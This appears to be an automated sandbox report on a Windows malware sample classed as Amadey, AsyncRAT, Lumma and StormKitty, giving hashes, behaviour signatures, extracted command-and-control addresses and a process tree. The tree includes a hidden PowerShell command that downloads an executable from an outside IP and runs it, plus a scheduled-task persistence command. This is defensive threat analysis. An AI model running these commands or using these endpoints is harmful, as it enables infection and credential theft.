Overview

overview

10

Static

static

5

2025-04-07...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 11:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    e408c7ab87d92c48a31d80255f3d7173

  • SHA1

    b786588fa8eda9761af63f013a605084c8e5e116

  • SHA256

    b4e06c1fe25b151ba0823bcda149fee5eab22b6c2e62015917417742c9b93395

  • SHA512

    cf2fe46fe507aa4a6d0c0b325bb28200c44b2742879d1d460fc38b73e5209fcddc178732f97ed6390cd0c653054166193d161c908e6723b8013dba378f7a2b99

  • SSDEEP

    24576:bqDEvCTbMWu7rQYlBQcBiT6rprG8a0+u:bTvC/MTQYxsWR7a0+

Score
10/10
amadeyasyncratlummastormkitty092155collectioncredential_accessdefense_evasiondiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
    defense_evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 11 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
    collection
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 25 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 17 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_e408c7ab87d92c48a31d80255f3d7173_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:928
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn YLKBymaIYpz /tr "mshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn YLKBymaIYpz /tr "mshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2824
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\NX4plKm5Y.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Users\Admin\AppData\Local\TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE
          "C:\Users\Admin\AppData\Local\TempVF7FDPOBHMLADEE6WDJ7EXZ4JYM3XDDK.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3916
            • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
              "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4312
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cedifdwu\cedifdwu.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2948
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB07.tmp" "c:\Users\Admin\AppData\Local\Temp\cedifdwu\CSCDB88C0EE9B144AC9ACDCC317486D288.TMP"
                  8⤵
                    PID:4592
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Accesses Microsoft Outlook accounts
                  • Accesses Microsoft Outlook profiles
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  • outlook_office_path
                  • outlook_win_path
                  PID:2412
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                    8⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:1376
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                    8⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:3740
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                    8⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4728
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffbb3b4dcf8,0x7ffbb3b4dd04,0x7ffbb3b4dd10
                      9⤵
                        PID:1948
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2568,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2564 /prefetch:3
                        9⤵
                          PID:3704
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2464,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2456 /prefetch:2
                          9⤵
                            PID:244
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2612,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2608 /prefetch:8
                            9⤵
                              PID:4400
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4300
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3272 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:708
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:2
                              9⤵
                              • Uses browser remote debugging
                              PID:4804
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,14665951532360064442,17609911209994234121,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4644 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:3464
                          • C:\Windows\system32\rundll32.exe
                            "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                            8⤵
                            • Modifies registry class
                            • Suspicious use of FindShellTrayWindow
                            PID:5752
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                            8⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:6060
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbb2d6f208,0x7ffbb2d6f214,0x7ffbb2d6f220
                              9⤵
                                PID:6096
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2212,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:3
                                9⤵
                                  PID:5380
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:2
                                  9⤵
                                    PID:2748
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2524,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
                                    9⤵
                                      PID:5348
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3620,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:1740
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3656,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:3204
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:5700
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4236,i,621159024216500056,1650139968837091860,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:2
                                      9⤵
                                      • Uses browser remote debugging
                                      PID:5696
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:6040
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5688
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5260
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5740
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:3340
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:2200
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5720
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4488
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5456
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:2436
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5284
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5812
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                    8⤵
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    PID:396
                              • C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
                                "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3748
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqtq4la2\cqtq4la2.cmdline"
                                  7⤵
                                    PID:4848
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E19.tmp" "c:\Users\Admin\AppData\Local\Temp\cqtq4la2\CSC6AA6D74395FA4BA0893B5F2F1BDD3A52.TMP"
                                      8⤵
                                        PID:4868
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4716
                                  • C:\Windows\SysWOW64\msiexec.exe
                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4292
                                  • C:\Users\Admin\AppData\Local\Temp\10492200101\Clickthis.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10492200101\Clickthis.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5216
                                    • C:\Users\Admin\AppData\Local\Temp\ade23ea5f364115a778c64d6280c8b6d\444.exe
                                      C:\Users\Admin\AppData\Local\Temp\ade23ea5f364115a778c64d6280c8b6d\444.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      PID:5000
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                        8⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3376
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 1180
                                          9⤵
                                          • Program crash
                                          PID:5492
                                  • C:\Users\Admin\AppData\Local\Temp\10492420101\X3vNPr9.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10492420101\X3vNPr9.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:2112
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      7⤵
                                        PID:5804
                                    • C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:788
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                        7⤵
                                          PID:5848
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          7⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5672
                                      • C:\Users\Admin\AppData\Local\Temp\10492730101\2edfcc2a37.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10492730101\2edfcc2a37.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2632
                                      • C:\Users\Admin\AppData\Local\Temp\10492740101\ff7091b049.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10492740101\ff7091b049.exe"
                                        6⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
